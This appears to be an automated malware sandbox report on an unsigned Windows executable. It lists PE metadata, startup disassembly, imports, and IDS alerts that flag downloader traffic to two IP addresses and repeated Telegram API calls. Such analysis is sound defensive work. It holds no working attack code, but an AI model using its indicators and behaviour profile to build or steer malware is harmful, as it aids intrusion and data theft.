                                      TLSH:DA35BF027391D022FF9B91734F5AF6115BBC6A660123E61F13A81DB9BE701B1163E7A3
                                      File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....
                                      Icon Hash:15192143534945d4
                                      Entrypoint:0x420577
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x66A08617 [Wed Jul 24 04:41:59 2024 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:5
                                      OS Version Minor:1
                                      File Version Major:5
                                      File Version Minor:1
                                      Subsystem Version Major:5
                                      Subsystem Version Minor:1
                                      Import Hash:948cc502fe9226992dce9417f952fce3
                                      Instruction
                                      call 00007FF310F3E7A3h
                                      jmp 00007FF310F3E0AFh
                                      push ebp
                                      mov ebp, esp
                                      push esi
                                      push dword ptr [ebp+08h]
                                      mov esi, ecx
                                      call 00007FF310F3E28Dh
                                      mov dword ptr [esi], 0049FDF0h
                                      mov eax, esi
                                      pop esi
                                      pop ebp
                                      retn 0004h
                                      and dword ptr [ecx+04h], 00000000h
                                      mov eax, ecx
                                      and dword ptr [ecx+08h], 00000000h
                                      mov dword ptr [ecx+04h], 0049FDF8h
                                      mov dword ptr [ecx], 0049FDF0h
                                      ret
                                      push ebp
                                      mov ebp, esp
                                      push esi
                                      push dword ptr [ebp+08h]
                                      mov esi, ecx
                                      call 00007FF310F3E25Ah
                                      mov dword ptr [esi], 0049FE0Ch
                                      mov eax, esi
                                      pop esi
                                      pop ebp
                                      retn 0004h
                                      and dword ptr [ecx+04h], 00000000h
                                      mov eax, ecx
                                      and dword ptr [ecx+08h], 00000000h
                                      mov dword ptr [ecx+04h], 0049FE14h
                                      mov dword ptr [ecx], 0049FE0Ch
                                      ret
                                      push ebp
                                      mov ebp, esp
                                      push esi
                                      mov esi, ecx
                                      lea eax, dword ptr [esi+04h]
                                      mov dword ptr [esi], 0049FDD0h
                                      and dword ptr [eax], 00000000h
                                      and dword ptr [eax+04h], 00000000h
                                      push eax
                                      mov eax, dword ptr [ebp+08h]
                                      add eax, 04h
                                      push eax
                                      call 00007FF310F40E4Dh
                                      pop ecx
                                      pop ecx
                                      mov eax, esi
                                      pop esi
                                      pop ebp
                                      retn 0004h
                                      lea eax, dword ptr [ecx+04h]
                                      mov dword ptr [ecx], 0049FDD0h
                                      push eax
                                      call 00007FF310F40E98h
                                      pop ecx
                                      ret
                                      push ebp
                                      mov ebp, esp
                                      push esi
                                      mov esi, ecx
                                      lea eax, dword ptr [esi+04h]
                                      mov dword ptr [esi], 0049FDD0h
                                      push eax
                                      call 00007FF310F40E81h
                                      test byte ptr [ebp+08h], 00000001h
                                      pop ecx
                                      Programming Language:
                                      • [ C ] VS2008 SP1 build 30729
                                      • [IMP] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xc8e64 | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xd4000 | 0x39328 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x10e000 | 0x7594 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xb0ff0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0xc3400 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xb1010 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x9c000 | 0x894 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x9ab1d | 0x9ac00 | 0a1473f3064dcbc32ef93c5c8a90f3a6 | False | 0.565500681542811 | data | 6.668273581389308 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x9c000 | 0x2fb82 | 0x2fc00 | c9cf2468b60bf4f80f136ed54b3989fb | False | 0.35289185209424084 | data | 5.691811547483722 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xcc000 | 0x706c | 0x4800 | 53b9025d545d65e23295e30afdbd16d9 | False | 0.04356553819444445 | DOS executable (block device driver @\273\) | 0.5846666986982398 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xd4000 | 0x39328 | 0x39400 | 9b6d1a1be2e3da009e88f47ed5808881 | False | 0.9474575259279476 | data | 7.9176369724718825 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x10e000 | 0x7594 | 0x7600 | c68ee8931a32d45eb82dc450ee40efc3 | False | 0.7628111758474576 | data | 6.7972128181359786 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xd4488 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xd45b0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xd46d8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xd4800 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | Great Britain | 0.20684803001876173
RT_ICON | 0xd58a8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | Great Britain | 0.4698581560283688
RT_MENU | 0xd5d10 | 0x50 | data | English | Great Britain | 0.9
RT_STRING | 0xd5d60 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xd62f4 | 0x68a | data | English | Great Britain | 0.2735961768219833
RT_STRING | 0xd6980 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xd6e10 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xd740c | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xd7a68 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xd7ed0 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xd8028 | 0x34dd2 | data | | | 1.0003509906248558
RT_GROUP_ICON | 0x10cdfc | 0x22 | data | English | Great Britain | 1.0588235294117647
RT_GROUP_ICON | 0x10ce20 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x10ce34 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0x10ce48 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0x10ce5c | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x10cf38 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
DLL | Import
WSOCK32.dll | gethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
VERSION.dll | GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll | WNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
WININET.dll | HttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
PSAPI.DLL | GetProcessMemoryInfo
IPHLPAPI.DLL | IcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
USERENV.dll | DestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
UxTheme.dll | IsThemeActive
KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
USER32.dll | GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
GDI32.dll | EndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
SHELL32.dll | DragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll | CreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture
Language of compilation system | Country where language is spoken | Map
English | Great Britain |
Timestamp | Protocol | SID | Signature | Source Port | Dest Port | Source IP | Dest IP
2024-07-25T03:35:25.760755+0200 | TCP | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 49737 | 443 | 192.168.2.5 | 188.114.97.3
2024-07-25T03:34:53.126997+0200 | TCP | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 49730 | 443 | 192.168.2.5 | 188.114.97.3
2024-07-25T03:34:35.748211+0200 | TCP | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 49704 | 80 | 192.168.2.5 | 158.101.44.242
2024-07-25T03:34:48.130043+0200 | TCP | 2033967 | ET HUNTING Observed Telegram API Domain (api .telegram .org in TLS SNI) | 49721 | 443 | 192.168.2.5 | 149.154.167.220
2024-07-25T03:34:50.357572+0200 | TCP | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 49722 | 80 | 192.168.2.5 | 158.101.44.242
2024-07-25T03:35:33.045497+0200 | TCP | 2045615 | ET HUNTING Telegram API Request (GET) | 49749 | 443 | 192.168.2.5 | 149.154.167.220
2024-07-25T03:34:48.376956+0200 | TCP | 2045615 | ET HUNTING Telegram API Request (GET) | 49721 | 443 | 192.168.2.5 | 149.154.167.220
2024-07-25T03:35:03.937735+0200 | TCP | 2033967 | ET HUNTING Observed Telegram API Domain (api .telegram .org in TLS SNI) | 49735 | 443 | 192.168.2.5 | 149.154.167.220
2024-07-25T03:34:48.133134+0200 | TCP | 2029322 | ET HUNTING Telegram API Certificate Observed | 443 | 49721 | 149.154.167.220 | 192.168.2.5
2024-07-25T03:35:32.797219+0200 | TCP | 2033967 | ET HUNTING Observed Telegram API Domain (api .telegram .org in TLS SNI) | 49749 | 443 | 192.168.2.5 | 149.154.167.220
2024-07-25T03:34:38.114931+0200 | TCP | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 49706 | 443 | 192.168.2.5 | 188.114.97.3
2024-07-25T03:34:47.487230+0200 | UDP | 2033966 | ET HUNTING Telegram API Domain in DNS Lookup | 56252 | 53 | 192.168.2.5 | 1.1.1.1
2024-07-25T03:35:29.798578+0200 | TCP | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 443 | 49743 | 40.127.169.103 | 192.168.2.5
2024-07-25T03:34:46.149772+0200 | TCP | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 49718 | 443 | 192.168.2.5 | 188.114.97.3
2024-07-25T03:34:38.826388+0200 | TCP | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 49707 | 80 | 192.168.2.5 | 158.101.44.242
2024-07-25T03:35:50.131796+0200 | TCP | 2033967 | ET HUNTING Observed Telegram API Domain (api .telegram .org in TLS SNI) | 49751 | 443 | 192.168.2.5 | 149.154.167.220
2024-07-25T03:34:41.435747+0200 | TCP | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 49711 | 80 | 192.168.2.5 | 158.101.44.242
2024-07-25T03:34:42.701479+0200 | TCP | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 49713 | 80 | 192.168.2.5 | 158.101.44.242
2024-07-25T03:34:37.513826+0200 | TCP | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 49704 | 80 | 192.168.2.5 | 158.101.44.242
2024-07-25T03:35:32.797234+0200 | TCP | 2029322 | ET HUNTING Telegram API Certificate Observed | 443 | 49749 | 149.154.167.220 | 192.168.2.5
2024-07-25T03:34:40.138843+0200 | TCP | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 49709 | 80 | 192.168.2.5 | 158.101.44.242
2024-07-25T03:34:52.576337+0200 | TCP | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 49722 | 80 | 192.168.2.5 | 158.101.44.242
2024-07-25T03:34:53.757840+0200 | TCP | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 49732 | 80 | 192.168.2.5 | 158.101.44.242
2024-07-25T03:34:51.655172+0200 | TCP | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 443 | 49723 | 20.12.23.50 | 192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                      Jul 25, 2024 03:34:39.402898073 CEST44349708188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:39.403146982 CEST44349708188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:39.403201103 CEST49708443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:39.403552055 CEST49708443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:39.411794901 CEST4970780192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:39.412985086 CEST4970980192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:39.417496920 CEST8049707158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:34:39.417552948 CEST4970780192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:39.417728901 CEST8049709158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:34:39.417865992 CEST4970980192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:39.417939901 CEST4970980192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:39.422688961 CEST8049709158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:34:40.090599060 CEST8049709158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:34:40.091881037 CEST49710443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:40.091979027 CEST44349710188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:40.092087030 CEST49710443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:40.092387915 CEST49710443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:40.092421055 CEST44349710188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:40.138843060 CEST4970980192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:40.601875067 CEST44349710188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:40.603908062 CEST49710443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:40.603935003 CEST44349710188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:40.739665031 CEST44349710188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:40.739754915 CEST44349710188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:40.739814997 CEST49710443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:40.740225077 CEST49710443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:40.744285107 CEST4970980192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:40.745201111 CEST4971180192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:40.750618935 CEST8049709158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:34:40.750701904 CEST4970980192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:40.751069069 CEST8049711158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:34:40.751137018 CEST4971180192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:40.751226902 CEST4971180192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:40.756920099 CEST8049711158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:34:41.385307074 CEST8049711158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:34:41.386740923 CEST49712443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:41.386854887 CEST44349712188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:41.386944056 CEST49712443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:41.387196064 CEST49712443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:41.387227058 CEST44349712188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:41.435746908 CEST4971180192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:41.870505095 CEST44349712188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:41.872325897 CEST49712443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:41.872361898 CEST44349712188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:42.030210018 CEST44349712188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:42.030308008 CEST44349712188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:42.030405998 CEST49712443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:42.030905962 CEST49712443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:42.038129091 CEST4971180192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:42.039304018 CEST4971380192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:42.043634892 CEST8049711158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:34:42.043747902 CEST4971180192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:42.044154882 CEST8049713158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:34:42.044245005 CEST4971380192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:42.044313908 CEST4971380192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:42.049148083 CEST8049713158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:34:42.646853924 CEST8049713158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:34:42.648602009 CEST49714443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:42.648653030 CEST44349714188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:42.648751020 CEST49714443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:42.648988008 CEST49714443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:42.648998976 CEST44349714188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:42.701478958 CEST4971380192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:43.131699085 CEST44349714188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:43.133347034 CEST49714443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:43.133368969 CEST44349714188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:43.291415930 CEST44349714188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:43.291522026 CEST44349714188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:43.291632891 CEST49714443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:43.292226076 CEST49714443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:43.296685934 CEST4971580192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:43.301572084 CEST8049715158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:34:43.301704884 CEST4971580192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:43.305710077 CEST4971580192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:43.310466051 CEST8049715158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:34:43.904547930 CEST8049715158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:34:43.906037092 CEST49716443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:43.906074047 CEST44349716188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:43.906167984 CEST49716443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:43.906389952 CEST49716443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:43.906404972 CEST44349716188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:43.951498985 CEST4971580192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:44.475282907 CEST44349716188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:44.477238894 CEST49716443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:44.477257967 CEST44349716188.114.97.3192.168.2.5
